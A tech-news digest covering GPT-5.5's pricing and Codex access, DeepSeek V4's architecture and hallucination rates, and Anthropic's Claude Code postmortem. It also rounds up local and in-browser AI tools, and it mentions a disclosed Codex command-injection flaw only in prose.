The frontier splits three ways: pricier, cheaper, and sorrier
OpenAI doubles prices and locks Codex in, DeepSeek undercuts on cost with caveats, and Anthropic ships a postmortem trying to rebuild trust.
The frontier splits three ways: pricier, cheaper, and sorrier
TL;DR
- GPT-5.5 lands in ChatGPT and Codex only at twice GPT-5.4’s token price, with no API and an 86% hallucination rate on unknowns.
- DeepSeek V4 ships MIT-licensed MoE models with 1M context, hitting 91% on SWE-bench Verified at roughly one-sixth Claude Opus 4.7’s cost.
- Anthropic blames two months of Claude Code regressions on three harness bugs — but Veracode’s outside tests still flag Opus 4.7.
- Alibaba’s Qwen3.6-27B dense model claims to beat its own 397B MoE flagship on coding while shrinking to a 16.8GB local quant.
- Browser-side AI keeps gaining ground: in-browser PDF extraction, Transformers.js Chrome extensions, and a single-PC Bluesky feed serving 72,000 users for $30/month.
Today the frontier labs are pitching three incompatible stories about what a top-tier model is supposed to be. OpenAI doubles GPT-5.5’s token price, withholds the API, and openly blesses the Codex subscription backdoor that Anthropic just banned — premium pricing and developer lock-in as a deliberate moat. DeepSeek answers from the other direction with V4: MIT-licensed, 1M-token context, SWE-bench numbers within shouting distance of Claude Opus 4.7 at roughly one-sixth the cost, paired with hallucination rates and provenance questions that nobody has answered. And Anthropic spends the day in apology mode, shipping a public postmortem that pins two months of Claude Code regressions on three harness bugs rather than the weights — a story that holds up internally but doesn’t fully survive Veracode’s outside tests.
Underneath the headline launches, the round-ups point at the other half of the story: a 27B Qwen dense model running on a Mac, PDF extraction moving into the browser, and a 72,000-user social feed served from one gaming PC.
GPT-5.5 ships at double the price with a Codex-shaped escape hatch
Source: simon-willison · published 2026-04-23
TL;DR
- GPT-5.5 launches in ChatGPT and Codex only — no API yet — at twice GPT-5.4’s token price.
- It tops Artificial Analysis’s Omniscience leaderboard at 57% while hallucinating on 86% of unknowns, more than double Claude Opus 4.7 1.
- OpenAI is openly blessing the Codex subscription “backdoor” Anthropic just banned, turning permissiveness into a developer-loyalty weapon 23.
- That same backend was recently patched for a command-injection bug that exfiltrated user tokens 4 — third-party plugins now inherit the blast radius.
A capability bump with a jagged ceiling
The headline number from Artificial Analysis is unambiguous: GPT-5.5 at xhigh reasoning takes the AA Omniscience crown at 57%, ahead of Claude Opus 4.7 and Gemini 3.1 Pro 1. The headline caveat is just as unambiguous: when it doesn’t know, it confabulates 86% of the time, versus 36% for Opus 4.7 and 50% for Gemini 3.1 Pro 1. Ethan Mollick’s “jagged frontier” line that Willison quotes lands harder with that context — independent reviewers report 5.5 can compress a decade of raw research into a publishable paper in four prompts, yet produces “flat” and “uncanny” long-form fiction with repetitive archetypes 5. The ceiling moved. The failure modes didn’t.
Simon Willison’s pelican benchmark tells the same story in miniature: the default response was “mangled,” but cranking reasoning_effort to xhigh burned 9,322 reasoning tokens (vs. 39 at default) over four minutes to produce something gradient-rich and nearly anatomically correct. The capability is real; you have to pay reasoning tokens to unlock it.
Twice the sticker, roughly 20% the real bill
API pricing is the second-loudest part of the launch. Once it ships, GPT-5.5 will run $5/$30 per million input/output tokens — exactly double GPT-5.4 — with Pro at $30/$180.
| Model | Input ($/1M) | Output ($/1M) |
|---|---|---|
| GPT-5.4 | 2.50 | 15.00 |
| GPT-5.5 | 5.00 | 30.00 |
| GPT-5.5 Pro | 30.00 | 180.00 |
The community pushback is sharper than “double is too much.” Developer threads converge on roughly 40% fewer output tokens per task, putting the effective workload increase closer to 20% 6. That’s still a real hike, and downstream tools are reportedly attaching ~7.5× request multipliers for 5.5 access 6 — so the per-task math depends entirely on whether your harness charges per token or per call.
The harness war OpenAI is winning by being permissive
Willison frames the /backend-api/codex/responses endpoint as a “semi-official backdoor,” but the backstory is a strategic decision. In February, Anthropic amended its Consumer Terms to explicitly forbid Free/Pro/Max OAuth tokens in any client outside the official Claude apps and Claude Code CLI, killing the subscription-arbitrage model that made OpenCode-style harnesses viable 2. OpenAI hired OpenClaw creator Peter Steinberger weeks later and committed to spinning the project into an independent OpenAI-backed foundation — analysts called it buying displaced developer loyalty in plain sight 3.
Willison’s new llm-openai-via-codex plugin, reverse-engineered from the open-source Codex repo, is exactly the kind of artifact that strategy is designed to produce: a respected community tool that quietly routes through ChatGPT subscriptions instead of the API.
The “semi-official backdoor” framing understates that this is an attack surface OpenAI only recently patched.
That permissiveness has a security tail. BeyondTrust disclosed a command-injection flaw in the same Codex backend, where a malicious GitHub branch name could execute code in the Codex cloud container and exfiltrate User Access Tokens 4. Plugins that persist Codex auth on developer laptops inherit that blast radius. The launch is two stories stapled together — a genuine but uneven capability jump 15, and a land-grab in the agent-harness war where OpenAI’s openness is simultaneously a competitive weapon 23 and a liability 4.
Further reading
- llm-openai-via-codex 0.1a0 — simon-willison
- Sign of the future: GPT-5.5 — one-useful-thing
DeepSeek V4 lands cheap, long, and politically loaded
Source: simon-willison · published 2026-04-24
TL;DR
- DeepSeek V4 ships two MIT-licensed MoE models with 1M-token context: Pro (1.6T/49B active) and Flash (284B/13B active).
- V4-Pro hits ~91.2% on SWE-bench Verified at roughly one-sixth the cost of Claude Opus 4.7 or GPT-5.5.
- A new Compressed/Heavily-Compressed Attention hybrid cuts KV cache to 10% and FLOPs to 27% of V3.2 at 1M context.
- Independent evals flag 94–96% hallucination rates on AA-Omniscience, plus unresolved questions about training hardware and Claude-distillation allegations.
The price chart is the headline
DeepSeek V4 is the first release of the post-V3 series, and the pricing is the part competitors will have to answer for. Flash lists at $0.14/$0.28 per million input/output tokens — under GPT-5.4 Nano and Gemini 3.1 Flash-Lite. Pro lists at $1.74/$3.48, undercutting Gemini 3.1 Pro and GPT-5.4 by roughly 4× on output. VentureBeat’s independent read puts V4-Pro at ~91.2% on SWE-bench Verified, in the same tier as Claude Opus 4.7 at about one-sixth the cost 7. Artificial Analysis ranks it second only to Kimi K2.6 among open-weights reasoning models 8.
Where the efficiency actually comes from
The Hugging Face companion post is the technically substantive half of this drop. V4 introduces a hybrid attention scheme — Compressed Sparse Attention (CSA) plus Heavily Compressed Attention (HCA) — with a small uncompressed sliding-window branch retained per layer to preserve local precision 9. The result, per DeepSeek’s own paper, is that V4-Pro at 1M context runs on 27% of V3.2’s per-token FLOPs and 10% of its KV cache; Flash drops to 10% and 7% respectively. That is the mechanism behind the price chart — not a subsidy, an architecture change aimed squarely at agentic workloads where context windows balloon.
The calibration problem
External benchmarks complicate the “near-frontier” story in one specific direction. On AA-Omniscience, V4-Pro and V4-Flash hallucinate on 94% and 96% of adversarial knowledge questions; Pro’s overall score of -10 means it generates more wrong answers than right ones, versus Claude 4.1 Opus at +4.8 8. Raw recall on SimpleQA is actually ahead of GPT-5.4 — the model knows things, it just refuses to refuse. For 1M-context agent deployments where one confident fabrication can poison a tool call, that is the wrong failure mode.
The negative score still reflects a model that generates more incorrect than correct answers on adversarial knowledge tasks. 8
The Huawei and Anthropic overhangs
Willison’s writeup skips the geopolitics; Tom’s Hardware doesn’t. V4 is the first DeepSeek model explicitly optimized for Huawei Ascend 950PR inference, and the paper is conspicuously quiet about what hardware did the pre-training 10. In the same news cycle, Anthropic alleged DeepSeek ran 16 million Claude queries through 24,000+ fraudulent accounts to distill reasoning and coding behavior 10. Independent V4-specific safety evaluations aren’t out yet; the closest baseline is Cisco’s R1 red-team, which recorded a 100% jailbreak success rate on HarmBench 11. Treat that as legacy data, but note that V4’s safety card is thin compared to U.S. labs’.
Local deployment is still a tease
Flash’s 160GB footprint looks like it fits a 128GB MacBook. Apidog’s hands-on guide says it works only with Unsloth’s 2-bit dynamic quants, KV cache forced to q8_0, and samplers pinned at min_p=0.05, temp ~0.6 — otherwise the 1.58-bit versions emit “rare token” gibberish 12. Pro at 865GB isn’t running on any laptop. The open weights are real; the practical home-lab story is “dev-box toy,” not local Claude.
What’s actually at stake
Western frontier labs now have an MIT-licensed model within 3–6 months of their best work, priced to make per-token economics indefensible for any application that doesn’t strictly need GPT-5.5-tier reasoning. The counter-argument isn’t capability — it’s calibration, provenance, and safety posture. Whether buyers care enough to pay the premium is the question the next quarter answers.
Further reading
- DeepSeek-V4: a million-token context that agents can actually use — huggingface-blog
Anthropic’s Claude Code postmortem: three harness bugs, one trust problem
Source: simon-willison · published 2026-04-24
TL;DR
- Two months of “Claude got worse” traced to three harness bugs, not weights — one cache-clear fired every turn.
- An April system prompt capping responses at 100 words alone cost ~3% on internal coding evals.
- Anthropic only moved past “skill issue” after an external audit of 6,850 sessions — second such postmortem in seven months.
- Independent Veracode tests still flag Opus 4.7 — the “harness was broken” framing doesn’t fully survive outside data.
Three bugs, all in the wrapper
Anthropic’s postmortem isolates three compounding changes between March and April, every one of them in the Claude Code harness rather than the model:
| Date | Change | Effect |
|---|---|---|
| Mar 4 | Default reasoning effort silently downgraded from “high” to “medium” to fix a UI freeze | Quieter, shallower responses |
| Mar 26 | Cache-pruning meant to clear stale thinking once after an hour of idle | Bug fired every turn for the rest of the session — Claude looked forgetful and repetitive |
| Apr 16 | System prompt capped inter-tool text at 25 words, final responses at 100 | ~3% drop on internal coding evals; rolled back Apr 20 13 |
Boris Cherny from the Claude Code team defended the cache change on Hacker News as cost protection for users running 900k-token contexts — except in practice it turned every post-idle turn into a cache miss and raised bills 14. Simon Willison’s own anecdote captures why this hurt: he keeps eleven idle Claude Code sessions running and estimates he prompts more in stale sessions than fresh ones. The “optimization for resumption” was sabotaging the dominant use case.
It took an outside audit to be believed
The more uncomfortable story is who actually surfaced this. For weeks, Anthropic told complaining users it was a prompting issue. What broke the dam was AMD senior director Stella Laurenzo publishing a quantitative audit of 6,850+ Claude Code sessions and 234,000 tool calls, documenting a shift from “research-first” to “lazy edit-first” behavior 15. Top Hacker News responses to the postmortem were vindication mixed with venom — “you weren’t dogfooding?!” — and accusations of weeks of gaslighting 14.
Anthropic explicitly denies ever degrading models to manage capacity or cost 16. Fine — but every one of these bugs came from a latency or token-saving optimization, which is exactly why the “AI shrinkflation” narrative keeps regenerating regardless of intent.
A pattern, not an incident
This is Anthropic’s second major quality postmortem in roughly seven months. September 2025 blamed TPU compiler bugs, context-window routing errors, and token corruption for a strikingly similar wave of “nerfing” complaints 17. Two data points isn’t a trend, but the shape is consistent: serving-stack and harness changes silently drift model behavior, internal evals don’t catch it because researchers don’t run the public build, and only external audits force the admission.
The “models are fine, the harness was broken” framing also doesn’t fully survive independent testing. Veracode’s recent analysis found Claude Opus 4.7 introduces security vulnerabilities in 52% of tested coding tasks — nearly double comparable OpenAI models 18. That’s a quality concern that outlives any harness fix.
Takeaway
If you’re building agentic systems, Willison is right that the postmortem is worth reading in detail — the failure modes are genuinely subtle. But the meta-lesson is grimmer: the dominant source of perceived “model degradation” in 2026 isn’t weights drift, it’s product-layer optimizations layered on top of non-deterministic models, with no eval methodology that reliably catches the regressions before users do. Transparency after the fact is good. A detection story that doesn’t depend on an AMD director auditing a quarter-million tool calls would be better.
Round-ups
Qwen3.6-27B: Flagship-Level Coding in a 27B Dense Model
Source: simon-willison
Alibaba’s Qwen3.6-27B dense model claims to beat its prior 397B-parameter MoE flagship across coding benchmarks while shrinking from 807GB to 55.6GB. Simon Willison ran the 16.8GB Q4_K_M quant locally via llama-server at roughly 25 tokens/second on a Mac.
Speeding up agentic workflows with WebSockets in the Responses API
Source: openai-blog
OpenAI details how it cut Codex agent loop overhead by adding WebSocket transport and connection-scoped caching to the Responses API, reducing per-call latency for long-running agentic workflows that repeatedly hit the same model context.
How to Use Transformers.js in a Chrome Extension
Source: huggingface-blog
Hugging Face publishes a walkthrough for embedding Transformers.js inside a Chrome extension, covering the manifest, service worker setup and model loading required to run inference locally in the browser without server calls.
Extract PDF text in your browser with LiteParse for the web
Source: simon-willison
Simon Willison ported LlamaIndex’s LiteParse PDF text extractor to run entirely in-browser on PDF.js and Tesseract.js, vibe-coded in a 59-minute Claude Code session and deployed via GitHub Pages so files never leave the user’s machine.
russellromney/honker
Source: simon-willison
Russell Romney’s honker is a Rust SQLite extension that ports Postgres-style NOTIFY/LISTEN, durable Kafka-like streams, and the transactional outbox pattern to SQLite, adding 20+ custom SQL functions and using 1ms WAL-file stat polling for near-real-time delivery.
Serving the For You feed
Source: simon-willison
Bluesky’s For You feed, used by about 72,000 people, runs from a single Go process on a 16-core, 96GB gaming PC in spacecowboy’s living room, fronted by a $7/month OVH VPS over Tailscale, with total operating cost of $30/month.
It’s a big one
Source: simon-willison
Simon Willison’s weekly newsletter rounds up an unusually heavy week: 5 blog posts, 8 links, 3 quotes, a new chapter of his Agentic Engineering Patterns guide, plus benchmark images including pelicans on bicycles, a possum on an e-scooter and raccoons with ham radios.
Footnotes
-
Artificial Analysis — https://artificialanalysis.ai/articles/openai-gpt5-5-is-the-new-leading-AI-model
↩ ↩2 ↩3 ↩4GPT-5.5 (xhigh) achieved a record accuracy of 57% on AA Omniscience… while recording an 86% hallucination rate, compared to Claude Opus 4.7’s 36% and Gemini 3.1 Pro’s 50%.
-
VentureBeat on Anthropic crackdown — https://venturebeat.com/technology/anthropic-cracks-down-on-unauthorized-claude-usage-by-third-party-harnesses
↩ ↩2 ↩3Anthropic formalized its stance by updating Consumer Terms to forbid using Free/Pro/Max OAuth tokens in any product other than the official Claude interface or Claude Code CLI — closing the arbitrage loophole OpenCode had exploited.
-
Forbes on Steinberger hire — https://www.forbes.com/sites/ronschmelzer/2026/02/16/openai-hires-openclaw-creator-peter-steinberger-and-sets-up-foundation/
↩ ↩2 ↩3OpenAI hired OpenClaw creator Peter Steinberger and committed to spinning the project into an independent OpenAI-backed foundation — a move analysts read as buying developer loyalty after Anthropic’s blocks.
-
BeyondTrust security research — https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token
↩ ↩2 ↩3A command injection vulnerability in the Codex backend allowed attackers to smuggle bash commands through the GitHub branch parameter and exfiltrate User Access Tokens from the Codex cloud container.
-
Xuepilot blog on Mollick review — https://blog.xuepilot.com/when-ai-can-write-phd-papers-but-cant-write-good-fiction
↩ ↩2GPT-5.5 could turn a decade of raw research data into a high-quality academic paper in four prompts, yet long-form fiction remained ‘flat,’ ‘uncanny,’ and riddled with repetitive archetypes.
-
r/vibecoding thread on pricing — https://www.reddit.com/r/vibecoding/comments/1suvvfk/gpt55_is_here_the_price_doubled_but_40_fewer/
↩ ↩2GPT-5.5 is here — the price doubled but [uses] 40% fewer [output tokens]; effective net hike closer to 20% for most workloads.
-
↩DeepSeek V4 arrives with near-state-of-the-art intelligence at 1/6th the cost of Opus 4.7 / GPT-5.5; V4-Pro reached approximately 91.2% on SWE-bench Verified, placing it in the same tier as Claude Opus 4.7.
-
Artificial Analysis — https://artificialanalysis.ai/articles/deepseek-is-back-among-the-leading-open-weights-models-with-v4-pro-and-v4-flash
↩ ↩2 ↩3DeepSeek V4 Pro and Flash exhibit hallucination rates of 94% and 96% respectively on the AA-Omniscience benchmark; while V4 Pro improved 11 points over V3.2 to a score of -10, the negative score still reflects a model that generates more incorrect than correct answers on adversarial knowledge tasks.
-
Hugging Face blog (DeepSeek V4) — https://huggingface.co/blog/deepseekv4
↩Hybrid Attention combining Compressed Sparse Attention (CSA) and Heavily Compressed Attention (HCA) cuts KV cache to 10% and FLOPs to 27% of V3.2 at 1M-token context, but a small uncompressed sliding-window branch is retained per layer to preserve fine-grained local dependencies.
-
↩ ↩2DeepSeek launches 1.6 trillion parameter V4 on Huawei chips as US escalates AI theft accusations — Anthropic alleged DeepSeek used over 24,000 fraudulent accounts to run 16 million queries against Claude to extract reasoning and coding capabilities.
-
Cisco Security blog (legacy R1 evaluation) — https://blogs.cisco.com/security/evaluating-security-risk-in-deepseek-and-other-frontier-reasoning-models
↩DeepSeek-R1 failed to block a single harmful prompt across the HarmBench dataset — a 100% attack success rate — making it roughly 11 times more likely to be exploited by cybercriminals than GPT-4o or Gemini; V4’s safety documentation remains limited compared to U.S. labs’ detailed safety cards.
-
Apidog deployment guide — https://apidog.com/blog/how-to-run-deepseek-v4-locally/
↩Unsloth’s dynamic quantization shrinks V4-Flash to roughly 157–160GB, making 128GB M-series MacBooks viable only with aggressive 2-bit quants; users must set min_p=0.05 and temperature ~0.6 or 1.58-bit versions produce ‘rare token’ incoherence.
-
↩An April 16 system prompt instruction told the model to ‘keep text between tool calls to ≤25 words’ and final responses to ≤100 words — a verbosity cap that produced a measurable ~3% drop in coding evaluations before being rolled back on April 20.
-
findskill.ai summary of HN thread 47878905 — https://findskill.ai/blog/claude-code-nerfed-postmortem-explained/
↩ ↩2Top HN commenters reacted with ‘you weren’t dogfooding?!’ and accused Anthropic of gaslighting users for weeks; Boris Cherny from the Claude Code team replied that the cache-clearing change was meant to protect users from runaway costs in 900k+ token contexts.
-
Medium — ‘Anthropic Admitted Claude Code Broke: We Were Right’ — https://medium.com/vibe-coding/anthropic-admitted-claude-code-broke-we-were-right-e3f3a6c60a31
↩AMD senior director Stella Laurenzo published an audit of 6,850+ Claude Code sessions and 234,000 tool calls showing a sharp shift from ‘research-first’ to ‘lazy edit-first’ behavior — external evidence that forced Anthropic past its initial ‘skill issue’ dismissals.
-
Business Insider — https://www.businessinsider.com/anthropic-admits-claude-code-issues-user-complaints-denies-nerfing-degrading-2026-4
↩Anthropic explicitly denies that it ever degrades models for capacity or cost-management reasons, framing the regressions as unintended consequences of latency optimizations rather than ‘nerfing.’
-
Tessl blog — https://tessl.io/blog/anthropic-postmortem-shows-how-small-changes-compounded-into-claude-code-failure/
↩This is Anthropic’s second major quality postmortem in seven months — September 2025 blamed TPU compiler bugs and context-routing errors for similar ‘nerfing’ complaints, suggesting a recurring pattern where serving-stack changes silently degrade model behavior.
-
Forbes / Veracode analysis — https://www.forbes.com/sites/the-wiretap/2026/04/22/anthropics-claude-is-pumping-out-vulnerable-code-cyber-experts-warn/
↩Veracode found Claude Opus 4.7 introduced security vulnerabilities in 52% of tested coding tasks — nearly double the rate of comparable OpenAI models — raising questions about quality even after the harness fixes.